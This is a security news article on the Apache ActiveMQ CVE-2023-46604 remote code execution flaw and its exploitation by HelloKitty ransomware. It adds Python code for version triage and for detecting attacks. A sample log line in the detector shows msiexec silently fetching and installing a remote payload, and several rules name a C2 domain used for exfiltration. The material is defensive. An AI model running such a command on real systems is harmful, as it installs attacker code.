
Details about the Apache ActiveMQ Vulnerability
The cybersecurity community is raising an alarm about a critical security flaw in the open-source message broker Apache ActiveMQ. The flaw, designated CVE-2023-46604, is a remote code execution vulnerability: a threat actor with network access to the service can run arbitrary shell commands, giving them a significant launchpad for further exploitation. The bug is of maximum severity, carrying a CVSS rating of 10.0. Affected versions include Apache ActiveMQ 5.18.0 before 5.18.3, 5.17.0 before 5.17.6, 5.16.0 before 5.16.7, and ActiveMQ before 5.15.16. It also affects the Legacy OpenWire Module from versions 5.8.0 to 5.18.0.
Patch Information for the Apache ActiveMQ Vulnerability
In response to the discovery of this critical vulnerability, patches have been released for Apache ActiveMQ. These include versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3, all of which were released late in the previous month. It's crucial for users of the affected ActiveMQ versions and the Legacy OpenWire Module to install these updates as soon as possible to mitigate the potential harm. Network scans for indicators of compromise should also be conducted regularly in light of this vulnerability.
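The affected-version ranges and the fixed releases above are easy to get wrong when checking an inventory by hand. The following is an added example, not code from the Apache ActiveMQ project or from this article: it encodes the ranges exactly as the article lists them, classifies a version string, and names the smallest patched release on the same branch. The helper names and the sample inventory are assumptions constructed for illustration.

```python
"""Classify Apache ActiveMQ version strings against CVE-2023-46604.

Added example for this article; not code from the Apache ActiveMQ project.
The version ranges are taken from the article text; the helper names and the
sample inventory below are constructed for illustration.
"""
from __future__ import annotations

import re

# (first affected version, inclusive; first fixed version, exclusive), per the article:
# 5.18.0 before 5.18.3, 5.17.0 before 5.17.6, 5.16.0 before 5.16.7, and anything before 5.15.16.
AFFECTED_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),
]

# The four patched releases named in the article.
FIXED_VERSIONS = ["5.15.16", "5.16.7", "5.17.6", "5.18.3"]


def parse_version(text: str) -> tuple[int, int, int]:
    """Parse 'major.minor[.patch]' (a suffix such as '-SNAPSHOT' is ignored)."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_affected(version: str) -> bool:
    """True if the version falls inside any affected range."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def recommended_fix(version: str) -> str | None:
    """Smallest patched release on the same branch, or None if already fixed."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi)
    return None


def triage(inventory: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """Return (host, running version, fix to install) for every host still exposed."""
    return [(host, ver, recommended_fix(ver)) for host, ver in inventory if is_affected(ver)]


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and versions are illustrative only).
    sample = [
        ("mq-01.example", "5.18.2"),
        ("mq-02.example", "5.18.3"),
        ("mq-03.example", "5.15.9"),
        ("mq-04.example", "5.16.7"),
    ]
    for host, ver, fix in triage(sample):
        print(f"{host}: {ver} is affected by CVE-2023-46604, upgrade to {fix}")
```

Running the block prints one line per still-exposed host; hosts already on a fixed release are silent. Note that the check is purely on the version string, so it complements rather than replaces the indicator-of-compromise scans the article recommends.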
Exploitation of Apache ActiveMQ Vulnerability by Cybercriminals
The cybercriminals exploiting the vulnerability have been linked to the HelloKitty ransomware family, based on the evidence available and the tone of the ransom note. Successful exploitation was typically followed by the adversary attempting to load remote binaries named M2.png and M4.png using the Windows Installer. Both MSI files contain a 32-bit .NET executable named dllloader that loads a Base64-encoded payload named EncDLL, which behaves as ransomware. It searches for and terminates a particular set of processes before initiating the encryption process and appending the ".locked" extension to the encrypted files.
Rapid7’s Observations on Exploitation of Apache ActiveMQ Vulnerability
Rapid7, a renowned cybersecurity firm, started detecting suspected exploitation attempts of the Apache ActiveMQ CVE-2023-46604 in two different customer environments on October 27, the same day the vulnerability details were disclosed to the public. In both cases, the adversaries attempted to deploy ransomware binaries on the targeted systems in an effort to hold the victim organizations to ransom. Rapid7's team tied the observed activity to the HelloKitty ransomware family, a conclusion drawn based on the available evidence and the content of the ransom note. Rapid7 also pointed out that the affected customer environments were running outdated versions of Apache ActiveMQ, emphasizing the importance of updates following the disclosure of a vulnerability.
Shadowserver Foundation’s Report on Apache ActiveMQ Vulnerability
In a separate report, the Shadowserver Foundation observed over 7,000 internet-exposed ActiveMQ instances. Of these, approximately 3,300 were vulnerable to attacks exploiting CVE-2023-46604 as of November 1, 2023. A significant proportion of these vulnerable servers were located in China, the U.S., Germany, South Korea, and India. These findings underscore the far-reaching implications of this critical vulnerability, which affects a large number of servers across different locations worldwide.
Technical Details and Availability of Proof of Concept
Further increasing the potential threat associated with the Apache ActiveMQ vulnerability is the public availability of detailed information and a Proof of Concept (PoC) exploit code. This means that other emerging threat groups and individual hackers can easily access this information and potentially plan and execute similar exploitation attempts. The insecure deserialization root cause of the vulnerability allows attackers to craft a specific kind of request that results in the execution of arbitrary shell commands.
Additionally, evidence has been observed of information stealers functioning alongside the ransomware attempts. Exploit attempts involving a callback URL that contained the domain 1ma[.]xyz have been detected. These attempts result in exfiltration of information from the server via HTTP POST requests or DNS tunneling, sending sensitive contents of the server, and environment variable names and their respective values, to a C2 domain.
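The post-exploitation chain described in the two sections above (Windows Installer fetching payloads named like images, the dllloader and EncDLL names, mass renames to ".locked", and callbacks to the 1ma[.]xyz domain over HTTP POST or DNS) translates directly into host and network detections. The following is an added example written for this article, not Rapid7's or anyone else's production logic: it runs four such rules over a constructed, pipe-delimited event log. The log format, the hostnames, the 203.0.113.10 address (a documentation-range address) and the sample lines are all constructed for illustration; the indicator names and the domain are the ones the article quotes.

```python
"""Detections for the CVE-2023-46604 post-exploitation activity this article describes.

Added example for this article; not code from Rapid7, Shadowserver or Apache.
The 'timestamp|host|event|detail' log format and the SAMPLE_LOG lines are constructed
for illustration. Indicator names and the callback domain come from the article.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Indicators quoted in the article (the domain is written defanged there as 1ma[.]xyz).
PAYLOAD_NAMES = ("M2.png", "M4.png", "dllloader", "EncDLL")
CALLBACK_DOMAINS = ("1ma.xyz",)
LOCKED_EXT = ".locked"
LOCKED_BURST_THRESHOLD = 2            # deliberately low for the sample; raise in production
LOCKED_BURST_WINDOW = timedelta(minutes=5)

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events: one compromised host (host-a), one host beaconing (host-b),
# and one benign local MSI install (host-c) that must not be flagged.
SAMPLE_LOG = [
    r'2023-10-27T14:02:11Z|host-a|process_create|image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /q /i http://203.0.113.10/M2.png"',
    r'2023-10-27T14:02:13Z|host-a|process_create|image=C:\Users\Public\dllloader.exe cmdline="dllloader.exe"',
    r'2023-10-27T14:03:40Z|host-a|file_rename|target=C:\Data\report.docx.locked',
    r'2023-10-27T14:03:41Z|host-a|file_rename|target=C:\Data\q3.xlsx.locked',
    r'2023-10-27T14:05:02Z|host-b|dns_query|qname=abc123.1ma.xyz',
    r'2023-10-27T14:06:00Z|host-b|http_request|method=POST url=http://1ma.xyz/upload',
    r'2023-10-27T14:07:00Z|host-c|process_create|image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /i C:\Temp\installer.msi"',
]


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


def _parse(line: str) -> tuple[datetime, str, str, str]:
    """Split one constructed 'timestamp|host|event|detail' record."""
    ts, host, event, detail = line.split("|", 3)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), host, event, detail


def _is_callback_domain(name: str) -> bool:
    """Exact or subdomain match against the known callback domains."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in CALLBACK_DOMAINS)


def scan(lines: list[str]) -> list[Finding]:
    findings: list[Finding] = []
    locked_events: dict[str, list[datetime]] = defaultdict(list)

    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        ts, host, event, detail = _parse(line)
        lowered = detail.lower()

        if event == "process_create":
            # Rule 1: Windows Installer given a remote URL whose file name is not an .msi.
            if "msiexec.exe" in lowered:
                for url in URL_RE.findall(detail):
                    if not urlparse(url).path.lower().endswith(".msi"):
                        findings.append(Finding(host, "msiexec_remote_nonmsi", url))
            # Rule 2: the payload and loader names quoted in the article.
            for name in PAYLOAD_NAMES:
                if name.lower() in lowered:
                    findings.append(Finding(host, "known_payload_name", name))

        elif event == "file_rename" and lowered.endswith(LOCKED_EXT):
            locked_events[host].append(ts)          # counted below as a burst

        elif event == "dns_query":
            # Rule 4a: DNS tunnelling shows up as lookups under the callback domain.
            qname = detail.split("qname=", 1)[-1]
            if _is_callback_domain(qname):
                findings.append(Finding(host, "c2_domain_contact", qname))

        elif event == "http_request":
            # Rule 4b: HTTP POST exfiltration to the callback domain.
            for url in URL_RE.findall(detail):
                if _is_callback_domain(urlparse(url).hostname or ""):
                    findings.append(Finding(host, "c2_domain_contact", url))

    # Rule 3: a burst of ".locked" renames on one host inside the window.
    for host, stamps in locked_events.items():
        stamps.sort()
        for i in range(len(stamps)):
            j = i
            while j < len(stamps) and stamps[j] - stamps[i] <= LOCKED_BURST_WINDOW:
                j += 1
            if j - i >= LOCKED_BURST_THRESHOLD:
                findings.append(Finding(host, "locked_extension_burst", f"{j - i} renames to {LOCKED_EXT}"))
                break
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host}: {f.rule} ({f.evidence})")
```

Rule 1 is the most durable of the four, because it keys on behaviour (msiexec fetching something over HTTP that is not named as an installer) rather than on the M2.png/M4.png names, which an operator can change at will; rules 2 and 4 are indicator matches that expire with the campaign, and rule 3 is a generic ransomware signal whose threshold and window need tuning to the environment's normal rename rate.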
Previous Exploits with Apache ActiveMQ
The recent Apache ActiveMQ CVE-2023-46604 incident is not the first time this popular open-source message broker has been targeted by cyber attackers. One notable example of a previously exploited vulnerability in Apache ActiveMQ is CVE-2016-3088, which allowed remote attackers to upload and execute arbitrary files, posing a substantial risk to the security and integrity of the affected systems. The repeated exploitation of Apache ActiveMQ vulnerabilities highlights their attractiveness to malicious actors and the importance of regular updates and security monitoring of these systems.